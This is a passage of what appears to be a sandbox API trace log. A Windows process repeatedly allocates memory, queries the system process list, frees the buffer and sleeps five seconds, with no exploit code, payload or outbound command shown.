ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.143] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.151] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 